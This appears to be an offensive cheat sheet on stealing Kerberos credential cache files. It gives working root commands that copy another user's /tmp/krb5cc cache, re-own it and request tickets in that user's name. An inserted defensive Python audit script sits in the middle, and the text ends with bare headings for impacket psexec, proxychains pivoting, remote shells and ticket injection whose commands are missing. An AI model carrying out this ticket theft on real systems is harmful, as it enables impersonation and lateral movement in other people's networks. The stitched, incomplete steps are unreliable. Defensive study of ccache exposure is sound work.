Kerberos Cache File
Attacking Credential Cache Files
If you have root access, you can copy the cache file.
List the cache files:
ls -al /tmp/krb5cc_*
Copy the file and change the ownership:
sudo cp /tmp/krb5cc_607000500_3aeIA5 /tmp/krb5cc_minenow
sudo chown kali:kali /tmp/krb5cc_minenow
To use this you must set the environment variable and destroy any old tickets:
kdestroy
klist
export KRB5CCNAME=/tmp/krb5cc_minenow
klist
Tickets can now be requested on their behalf:
kvno MSSQLSvc/DC01.test.domain:1433
Run klist to view the newly added ticket.
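The copy-and-chown step above works because a FILE-type credential cache is just bytes on disk: whoever can read the file holds the tickets. As an added example (not from the original page), the script below audits /tmp for such caches from the defender's side: it flags a cache whose owner no longer matches the uid embedded in its krb5cc_<uid> name, a cache readable by group or other, and it reads the default principal out of the MIT ccache v3/v4 header so an analyst can see whose tickets are sitting there. The build_sample_ccache helper, the svc_sql principal and the TEST.DOMAIN realm are constructed for the demonstration; the krb5cc_<uid>[_random] naming and the header layout follow MIT Kerberos.

```python
#!/usr/bin/env python3
"""Audit FILE-type Kerberos credential caches under /tmp (added example)."""
import os
import re
import stat
import struct
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# MIT libkrb5 names caches /tmp/krb5cc_<uid> or /tmp/krb5cc_<uid>_<random>
CCACHE_NAME = re.compile(r"^krb5cc_(\d+)(?:_.+)?$")


@dataclass
class CacheFinding:
    path: str
    principal: Optional[str]
    issues: List[str] = field(default_factory=list)


def _read_counted(buf: bytes, off: int) -> Tuple[bytes, int]:
    """Read a counted_octet_string: big-endian uint32 length, then the bytes."""
    (n,) = struct.unpack_from(">I", buf, off)
    off += 4
    return buf[off:off + n], off + n


def parse_default_principal(buf: bytes) -> str:
    """Return the default principal (comp1/comp2@REALM) of a v3/v4 MIT ccache."""
    (version,) = struct.unpack_from(">H", buf, 0)
    off = 2
    if version == 0x0504:
        # v4 carries a tagged header (e.g. KDC time offset) before the principal.
        (hdr_len,) = struct.unpack_from(">H", buf, off)
        off += 2 + hdr_len
    elif version != 0x0503:
        raise ValueError(f"unsupported ccache version 0x{version:04x}")
    _name_type, ncomp = struct.unpack_from(">II", buf, off)
    off += 8
    realm, off = _read_counted(buf, off)
    comps = []
    for _ in range(ncomp):
        comp, off = _read_counted(buf, off)
        comps.append(comp.decode("utf-8", "replace"))
    return "/".join(comps) + "@" + realm.decode("utf-8", "replace")


def classify_cache(path: str, owner_uid: int, mode: int, contents: bytes) -> CacheFinding:
    """Apply the ownership, permission and parse checks to one cache file."""
    finding = CacheFinding(path=path, principal=None)
    m = CCACHE_NAME.match(os.path.basename(path))
    if m and int(m.group(1)) != owner_uid:
        finding.issues.append(f"named for uid {m.group(1)} but owned by uid {owner_uid}")
    if mode & (stat.S_IRGRP | stat.S_IROTH):
        finding.issues.append(f"readable by group/other (mode {stat.S_IMODE(mode):04o})")
    try:
        finding.principal = parse_default_principal(contents)
    except (struct.error, ValueError) as exc:
        finding.issues.append(f"unparseable cache: {exc}")
    return finding


def audit_directory(directory: str = "/tmp") -> List[CacheFinding]:
    """Walk a directory and classify every krb5cc_* regular file in it."""
    findings = []
    for entry in os.scandir(directory):
        if not entry.name.startswith("krb5cc_") or not entry.is_file(follow_symlinks=False):
            continue
        st = entry.stat(follow_symlinks=False)
        try:
            with open(entry.path, "rb") as fh:
                head = fh.read(4096)  # header + principal fit comfortably here
        except OSError as exc:
            findings.append(CacheFinding(entry.path, None, [f"unreadable: {exc}"]))
            continue
        findings.append(classify_cache(entry.path, st.st_uid, st.st_mode, head))
    return findings


def build_sample_ccache(user: str, realm: str) -> bytes:
    """Constructed sample: v4 header plus default principal, no credentials."""
    def counted(b: bytes) -> bytes:
        return struct.pack(">I", len(b)) + b
    header = struct.pack(">HH", 1, 8) + struct.pack(">II", 0, 0)  # tag 1: time offset
    body = struct.pack(">II", 1, 1) + counted(realm.encode()) + counted(user.encode())
    return struct.pack(">HH", 0x0504, len(header)) + header + body


if __name__ == "__main__":
    for f in audit_directory():
        print(f"{'SUSPECT' if f.issues else 'ok':7} {f.path} "
              f"principal={f.principal} {'; '.join(f.issues)}")
```

Run as root (or as any user able to stat /tmp) to list every cache and its principal; a cache named for one uid but owned by another, or a cache readable by other users, is exactly the artifact the procedure above produces or relies on, and the principal field tells you which account's tickets are exposed.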
Moving the krb5 file to your kali box
Then
Verify
Then test access with impacket psexec
Kerberos with Impacket
In order to perform ticket manipulation, we need to install the Kerberos Linux client utilities on the Kali box.
If you screw up the install or need to change something:
sudo dpkg-reconfigure krb5-config
We'll also have to copy the ccache file previously obtained to our local Kali box.
Next we'll have to update the environment variable on our local Kali box.
We'll need to update the hosts file to map the hostnames to IP addresses.
The source IP address will also have to be correct, so proxychains will need to be used.
In proxychains4.conf, the DNS setting will need to be commented out.
Set up a SOCKS server on the pivot host.
Now proxychains and impacket can be used to interact with the remote host.
Gather a list of SPNs available.
Get a shell on the remote box.
Renew
Convert ccache to Kirbi
Inject the ticket on the compromised host.